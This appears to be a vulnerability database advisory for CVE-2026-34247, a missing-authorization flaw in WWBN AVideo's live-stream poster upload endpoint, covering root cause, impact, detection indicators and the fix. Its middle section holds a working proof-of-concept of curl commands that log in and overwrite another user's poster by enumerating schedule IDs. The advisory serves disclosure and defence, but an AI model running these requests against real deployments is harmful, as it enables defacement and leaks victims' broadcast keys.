
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-34247 is an Insecure Direct Object Reference (IDOR) / Missing Authorization vulnerability in WWBN AVideo, an open source video platform. It affects all versions up to and including 26.0, where the plugin/Live/uploadPoster.php endpoint allows any authenticated user to overwrite the poster image for any scheduled live stream by supplying an arbitrary live_schedule_id. The vulnerability was published on March 27, 2026, with a fix committed the same day. It carries a CVSS v3.1 base score of 5.4 (Medium) (GitHub Advisory, Github Advisory).
The root cause is CWE-862 (Missing Authorization): the plugin/Live/uploadPoster.php endpoint accepts a user-controlled live_schedule_id parameter from $_REQUEST and only validates that the requesting user is logged in via User::isLogged(), without verifying that the authenticated user owns the targeted live schedule. The Live_schedule::getPosterPaths() static method constructs file paths purely from the numeric ID, and after overwriting the poster file via move_uploaded_file(), the endpoint calls Live::notifySocketStats("socketLiveOFFCallback", $array) which broadcasts the victim's broadcast key and users_id to all connected WebSocket clients via sendSocketMessageToAll(). Notably, parallel endpoints (uploadPoster.json.php and view/Live_schedule/uploadPoster.php) do implement ownership checks, confirming this omission is an oversight. Schedule IDs are sequential integers, making enumeration trivial (GitHub Advisory).
Successful exploitation allows any authenticated user to tamper with content by overwriting poster images on any other user's scheduled live stream, enabling defacement or phishing attacks (e.g., replacing a legitimate poster with a malicious redirect image). The socketLiveOFFCallback broadcast triggered after each exploit leaks the victim's broadcast key and users_id to all connected WebSocket clients, constituting an information disclosure risk. Additionally, the false offline notification misleads all connected viewers into believing the victim's stream has gone offline, disrupting the victim's audience and platform integrity (GitHub Advisory).
A proof-of-concept (PoC) exploit is publicly available in the GitHub Security Advisory, consisting of concrete curl commands that demonstrate the full attack chain against a real AVideo deployment. The EPSS score is approximately 0.013% (2nd percentile), indicating low current exploitation probability. There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The vulnerability requires only a low-privilege authenticated account and no user interaction, lowering the barrier for exploitation (Github Advisory, GitHub Advisory).
live_schedule_id integers (e.g., 1, 2, 3, ...) to identify valid targets.curl -c cookies.txt -X POST 'https://target.com/objects/login.json.php' \
-d 'user=attacker@example.com&pass=attackerpassword'live_schedule_id belonging to another user:curl -b cookies.txt \
-F 'file_data=@malicious.jpg' \
-F 'live_schedule_id=1' \
-F 'live_servers_id=0' \
'https://target.com/plugin/Live/uploadPoster.php'{}) and broadcasts a socketLiveOFFCallback WebSocket message to all connected clients containing the victim's broadcast key and users_id.curl -o - 'https://target.com/videos/live_schedule_posters/schedule_1.jpg' | file -/plugin/Live/uploadPoster.php from users who do not own the targeted live_schedule_id; repeated requests to the same endpoint with incrementing live_schedule_id values (enumeration pattern)./plugin/Live/uploadPoster.php with live_schedule_id values not associated with the authenticated user's account; multiple rapid requests from a single session targeting different schedule IDs.socketLiveOFFCallback messages broadcast to WebSocket clients containing broadcast key and users_id fields at unusual times (e.g., when the stream owner is not actively managing their stream).videos/live_schedule_posters/ (e.g., schedule_<id>.jpg) that do not correspond to actions by the schedule owner; replacement of legitimate poster images with unrecognized content (GitHub Advisory).The fix is available in commit 5fcb3bdf59f26d65e203cfbc8a685356ba300b60, which adds an ownership check in plugin/Live/uploadPoster.php immediately after the login verification — rejecting requests where the authenticated user is neither an admin nor the owner of the targeted schedule. Administrators should upgrade to a version of AVideo that includes this commit (post-26.0). As a temporary workaround, restrict access to the /plugin/Live/uploadPoster.php endpoint via web server configuration (e.g., require additional authentication or block external access) until the patch can be applied. Additionally, audit existing live stream poster images to verify they have not been tampered with (Patch Commit, GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."